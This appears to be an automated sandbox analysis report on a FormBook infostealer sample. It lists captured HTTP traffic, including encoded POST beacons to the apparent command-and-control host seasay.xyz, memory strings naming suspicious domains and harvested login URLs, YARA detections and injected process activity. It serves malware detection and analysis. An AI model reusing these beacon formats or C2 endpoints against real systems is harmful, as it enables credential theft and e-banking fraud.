HTTP traffic detected: POST /c9ts/ HTTP/1.1Host: www.seasay.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.seasay.xyzReferer: http://www.seasay.xyz/c9ts/Content-Length: 196Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0(iPad; U; CPU OS 8_1.1 like Mac OS X; en-us) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.6 Mobile/8F191 Safari/6534.18.5Data Raw: 7a 58 41 30 44 50 5a 3d 57 30 4a 59 34 44 6c 67 38 7a 6d 57 35 46 36 57 58 32 78 58 4d 50 49 78 69 4a 75 36 49 52 48 59 6e 55 4c 6b 7a 41 74 66 75 65 4b 75 72 51 35 70 50 52 74 73 32 58 79 46 63 6c 75 6f 49 52 59 54 59 4b 44 4b 54 43 74 31 59 32 2f 49 30 47 63 49 70 45 34 70 57 54 45 55 36 4b 7a 67 50 58 5a 69 6f 64 6d 78 4c 71 6f 66 58 49 2b 4c 37 36 62 4b 35 66 52 48 31 69 32 65 45 32 57 75 44 59 42 30 36 32 51 56 2f 32 4d 73 62 32 48 6b 75 32 32 5a 47 36 32 51 35 4f 2b 50 30 55 43 61 74 4b 43 4f 31 2f 65 31 62 32 39 4d 74 42 6d 38 77 75 38 61 2b 52 35 79 54 54 4e 70 66 38 65 37 Data Ascii: zXA0DPZ=W0JY4Dlg8zmW5F6WX2xXMPIxiJu6IRHYnULkzAtfueKurQ5pPRts2XyFcluoIRYTYKDKTCt1Y2/I0GcIpE4pWTEU6KzgPXZiodmxLqofXI+L76bK5fRH1i2eE2WuDYB062QV/2Msb2Hku22ZG62Q5O+P0UCatKCO1/e1b29MtBm8wu8a+R5yTTNpf8e7

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:37:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RhrOjvAM9uUKolVb4InL3VmReNioe7TRgE3HOmt48g%2Fxm6nKR1vR1eyFOpVK9%2BJr887ncLwlFh3ER4InECKf3FT6C75%2FkGC%2BoWW0MUfptoe8FSCbUDBrjceEmPPvU18tr%2F5lSdxHBq4Vehs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc99b78f17652-SEAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=67059&min_rtt=67059&rtt_var=33529&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=843&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 59 59 93 a3 48 92 7e ef 5f a1 ed b5 35 9b 31 2a 87 fb ca ee 1a 5b 6e 90 04 e2 16 e8 8d 1b c4 29 6e 69 6c fe fb 9a b2 aa 7b aa b2 a4 ea ea 9d 7d d8 78 11 41 84 bb 87 bb 7f fe 79 24 f9 d3 4f 3f fd fa 1f fc 81 b3 7d 5d d8 e4 63 5d fd fd a7 5f 3f fd 6c 36 9b cd af 79 12 c4 9f 1f eb 64 0c 36 f9 38 76 2f c9 65 2a e6 8f 3f 73 6d 33 26 cd f8 32 5e bb e4 e7 4d f4 69 f6 f1 e7 31 59 47 f0 ae e2 97 4d 94 07 fd 90 8c 1f a7 31 7d a1 7e 7e aa 27 88 f2 e4 e5 2e df b7 d5 17 8a 9a f6 25 ba 2f 3d 15 d4 fb 20 ab 83 3f 23 21 ac 5d d1 27 c3 17 22 d0 57 7b 9b a0 4e 3e fe 3c 17 c9 d2 b5 fd f8 c5 b6 a5 88 c7 fc 63 9c cc 45 94 bc bc 4d 3e 6c 8a a6 18 8b a0 7a 19 a2 a0 4a 3e c2 7f fb 5d d5 58 8c 55 f2 77 0c c2 36 5a 3b 6e c4 76 6a e2 5f c1 4f 2f 3f 6d 18 c6 6b 95 6c ee 71 fb 1c ae 68 18 3e 0b df 47 d8 c6 d7 cd 3f 7e 9f de 47 da 36 e3 4b 1a d4 45 75 7d dd 30 7d 11 54 1f 36 72 52 cd c9 58 44 c1 87 cd 10 34 c3 cb 90 f4 45 fa cb b7 62 43 71 4b 5e 37 30 d6 ad 5f 2f 56 45 93 bc e4 49 91 e5 e3 eb 06 Data Ascii: fcbYYH~_51[n)nil{}xAy$O?}]c]_?l6yd68v/e?sm3&2^Mi1YGM1}~~'.%/= ?#!]'"W{N><cEM>lzJ>]XUw6Z;nvj_O/?mklqh>G?~G6KEu}0}T6rRXD4EbCqK^70_/VEI
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:37:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RC307wLlfONcV22%2FHLpOk35rr%2FFwOOBqr5VuEgElLyEMCzVp%2B8nOCaBqIxB2W7XMMCZ49lO424tdNkyCuOykUIU4j38muZh2GvgoAXKfrucG%2FenrRneA2%2BF%2F1QhLabh8HuZ7DhgRC8Jj%2BLY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc9bacd11e857-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=37306&min_rtt=37306&rtt_var=18653&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=548&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 61 32 66 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a Data Ascii: 2a2f<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0">
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:38:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JcPawhsr9T%2BA14CReHCOQhrw4I66GB01kA4mXTeSKnkbIZDbfJxlBxNYLs6mltcBDN1U%2Bp7i94pSGFdW5QmjgnWok5EDhTUleSU43MmeiJSDF5AQyicL2GySxfPF5gNSRYzC4WnuA6g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc9e6b96c71f8-LHRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=71479&min_rtt=71479&rtt_var=35739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=810&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:38:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=77bs53Av04iUzMkQMVCsPVxMfzGVoWvjEMP5qqz83keNIaH9cOvYncRnLA4VRpFZz7%2FbaOYiSoUo19ib4fGLF3g9bEgkOq4ct5cnKoiaOwd5C9pk6FCMBqcGLLsxBCXwL2HHo32rJdg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc9f6dbdd76bb-SEAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=67236&min_rtt=67236&rtt_var=33618&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=834&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:38:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A3mUqzH8F4ImIQ%2BHA5WFJV3h4WFETqULZqi%2FI0J6w76EcrDsliyJhr2plFvGQkLoPolULlJPFl7cQ0NsL3yGMPPheHrLtun9LgGFMHt%2B7BWFdKHvRBDWaAIkdbFkjQ2s5gZR8w2K09o%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fca068d6176b4-SEAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=67108&min_rtt=67108&rtt_var=33554&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1847&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 36 61 0d 0a b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f6a(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:38:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bxwAYGSrP979%2BYUNPU1T26%2FoJOdruH%2BrCbIlJIhLok1KRKs7mFB%2F3wUwk2Q7ymKtdenty9T3TANLHvXmRUdzM%2BDkdA20A6oXxqdY%2FC8abxw%2Bhs1ktCk9rbtat57c2CkY73j066E%2BdKQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fca162ca2a29f-YULalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=17506&min_rtt=17506&rtt_var=8753&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=545&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:38:18 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:38:22 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:38:24 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:38:27 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: runonce.exe, 0000000D.00000002.2540650822.0000000005898000.00000004.10000000.00040000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000E.00000002.2539195431.0000000003898000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: x.exe, 00000009.00000002.1308549108.0000000000B0D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: powershell.exe, 00000002.00000002.1302140636.000000000668F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1298965787.00000000051A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1308771649.0000000007670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1298965787.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1298965787.00000000051A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1308771649.0000000007670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: UmhFZco3dB3hLZpEx5uvm.exe, 0000000E.00000002.2540611173.000000000562F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.kjuw.party
Source: UmhFZco3dB3hLZpEx5uvm.exe, 0000000E.00000002.2540611173.000000000562F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.kjuw.party/e0jv/
Source: runonce.exe, 0000000D.00000003.1947011375.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.1298965787.0000000005051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: runonce.exe, 0000000D.00000003.1947011375.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: runonce.exe, 0000000D.00000003.1947011375.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: runonce.exe, 0000000D.00000003.1947011375.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000002.00000002.1302140636.000000000668F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1302140636.000000000668F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1302140636.000000000668F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: runonce.exe, 0000000D.00000003.1947011375.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: runonce.exe, 0000000D.00000003.1947011375.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: runonce.exe, 0000000D.00000003.1947011375.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000002.00000002.1298965787.00000000051A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1308771649.0000000007670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: runonce.exe, 0000000D.00000002.2530133525.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: runonce.exe, 0000000D.00000002.2530133525.0000000002EB5000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000D.00000003.1942060200.0000000002EB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: runonce.exe, 0000000D.00000003.1942060200.0000000002EB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: runonce.exe, 0000000D.00000002.2530133525.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: runonce.exe, 0000000D.00000002.2530133525.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033~
Source: runonce.exe, 0000000D.00000002.2530133525.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: runonce.exe, 0000000D.00000002.2530133525.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: runonce.exe, 0000000D.00000003.1940893094.0000000007B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000002.00000002.1302140636.000000000668F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: runonce.exe, 0000000D.00000003.1947011375.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: runonce.exe, 0000000D.00000003.1947011375.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: UmhFZco3dB3hLZpEx5uvm.exe, 0000000E.00000002.2539195431.0000000003706000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.seasay.xyz/c9ts/?zXA0DPZ=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExA
Source: runonce.exe, 0000000D.00000002.2540650822.0000000005574000.00000004.10000000.00040000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000E.00000002.2539195431.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.2057913770.00000000285E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/
Source: runonce.exe, 0000000D.00000002.2540650822.0000000005574000.00000004.10000000.00040000.00000000.sdmp, UmhFZco3dB3hLZpEx5uvm.exe, 0000000E.00000002.2539195431.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.2057913770.00000000285E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1752374705.0000000003F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1748675402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2538512938.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2540611173.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1749625509.0000000002560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2538511146.00000000041E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2538743686.0000000004900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2528459776.0000000002C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 8104, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

.NET source code contains very large strings

Source: x.exe.2.dr, Idbi0WY----jg--iKh--Qk-D-.cs	Long String: Length: 385720
Source: 2.2.powershell.exe.66d7ef8.0.raw.unpack, Idbi0WY----jg--iKh--Qk-D-.cs	Long String: Length: 385720

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042CAA3 NtClose,	10_2_0042CAA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832B60 NtClose,LdrInitializeThunk,	10_2_02832B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_02832C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_02832DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_02832DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_028335C0 NtCreateMutant,LdrInitializeThunk,	10_2_028335C0
